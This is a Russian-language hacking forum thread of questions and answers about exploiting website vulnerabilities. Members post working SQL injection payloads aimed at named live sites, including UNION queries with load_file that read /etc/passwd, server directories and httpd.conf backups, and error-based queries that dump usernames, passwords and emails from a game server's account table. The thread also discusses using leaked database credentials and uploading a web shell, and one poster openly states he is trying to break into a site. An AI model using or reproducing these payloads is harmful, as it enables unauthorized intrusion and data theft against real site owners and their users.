Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
    Code:
    http://5788sagebrookdrive.com/property-details?mls=-1'+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a),1+)+--+;&src=1
    
    Как узнать где сайт лежит?
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    http://5788sagebrookdrive.com/phpinfo.php
     
    _________________________
    yarbabin likes this.
  3. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
  4. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
    Все хорошо, но
    Code:
    _SERVER["SCRIPT_FILENAME"]    /home/lwdhost/www/live.realcove.com/index.php
    http://5788sagebrookdrive.com/phpinfo.php
    Br@!ns
    Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost.
    ----------
    спасибо на этом хотя бы

     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    радость-то какая, наконец-то могу пощупать эту фишку freebsd:
    Code:
    http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/etc/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
    т. е. при чтении директории получаете список файлов и папок
    директория /home/lwdhost/
    Code:
    http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/home/lwdhost/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1

    почему такая ерунда с папками? в httpd прописаны алиасы:
    Code:
    http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,load_file%28%27/home/MPS.httpd.conf.bk25oct2010%27%29,1+%29+--+;&src=1
    Code:
    addisonklein
    advancedlabs
    brian
    brian1
    cameron
    canon-copier
    coldwellca
    cortexx
    dns
    formbuilder
    grijalva
    impact
    jennie
    jira
    lwdhost
    mayer
    mlsimages
    olyins
    outgoing
    pcmls
    puddlejumpers
    riverbendranch
    ryanm
    steve1
    tara
    theofficialjeff
    tyler
    unixsa
    vera
    koliopoulos
    gsmls
    MPS.httpd.conf.bk25oct2010
    MPS.php.ini.bk25oct2010
    VPS.httpd.conf.bk25oct2010
    VPS.php.ini.bk25oct2010
    
    нужно перебрать все папки и найти доступную на чтение и запись, заодно найти httpd.conf и найти для каждого document_root
     
    _________________________
  6. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    в magento конфиге (local.xml) есть вот такая запись, ниже данных Mysql:

    <backend_options>
    <server>
    <![CDATA[154aa11236c94e56a08ba446a89f4ae4.publb.rackspaceclouddb.com]]>
    </server>
    <port>
    <![CDATA[52412]]>
    </port>
    <database>
    <![CDATA[0]]>
    </database>
    <password>
    *password*
    </password>

    Что она означает? и как можно подключиться по этим данным?
     
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Похоже на Redis Cache, в нете туториалы есть )
     
    Br@!ns likes this.
  8. rumbln

    rumbln Member

    Joined:
    6 Feb 2011
    Messages:
    19
    Likes Received:
    5
    Reputations:
    5
    Помогите составить запрос в бд плиз) ситуация следующая, есть скуля необходимо узнать название колонки в которой имеется значение 3.00 для юзера с id=6010.
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    SELECT * FROM таблица_с_юзерами WHERE id = 6010.
    в ответе получите все данные по пользователю и узнаете имя колонки
     
    _________________________
    huntercs16 likes this.
  10. AndreyBerkut

    AndreyBerkut New Member

    Joined:
    16 Dec 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Хелп плз
    при попытке выполнить 25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING(group_concat(count(*)),1))from(realmd.account)))))and(1)='1 появляется ошибка Query failed : FUNCTION realmd.ExtractValue does not exist
    Как я понял, в этой версии mysql еще нет функции ExtractValue. Какие есть альтернативы?

    P.S.
    25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,username,password,email) from account limit 0,1), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log
     
  11. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    По по воду версий https://dev.mysql.com/doc/refman/5.1/en/xml-functions.html.
    Если остальные техники вывода не отрабатывают, используйте вывод через ошибку группировки.
     
    AndreyBerkut likes this.
  12. AndreyBerkut

    AndreyBerkut New Member

    Joined:
    16 Dec 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    через union? Он, там тоже не работает, поскольку запрос выглядит примерно так:
    INSERT INTO account VALUES (username,password,email);
    И вроде как, union работает только на Select, или я ошибаюсь?

    Вообще, вот уязвимый сайт, который пытаюсь взломать... http://wow.kwinta.net/index.php?id=registration.html
    Уязвимо поле ввода имени аккаунта...
     
  13. AndreyBerkut

    AndreyBerkut New Member

    Joined:
    16 Dec 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    как бы я не пытался его сунуть, появляется ошибка You have an error in your SQL syntax...
    Не подскажете, как в моем случае его нужно правильно применять?
     
  14. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Вы сами написали вектор вывода для версии, далее все по аналогии.
     
  15. AndreyBerkut

    AndreyBerkut New Member

    Joined:
    16 Dec 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Всё понял, получилось, спасибо :)
    Еще вопрос: реально ли залить шелл через эту уязвимость?
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    https://forum.antichat.ru/threads/43966/
     
    _________________________
  17. HelpMeS

    HelpMeS New Member

    Joined:
    16 May 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  18. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  19. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    '<1 group by mid(version(),rand())having avg(0)#
     
    BigBear likes this.
  20. Hassle

    Hassle New Member

    Joined:
    12 Jun 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    всем привет, 2 года пытаюсь взломать нужные мне сайты, но все тщетно..
    сегодня ночью прогонял один сайт через Acunetix, выдало вот такие алерты, можно ли их как-то поюзать или фигня?
    я давно не затрагивал инъекции и поэтому позабыл уже что и как, на сайте фильтруется запрос " ' " и выползает на его месте %27...


    [​IMG]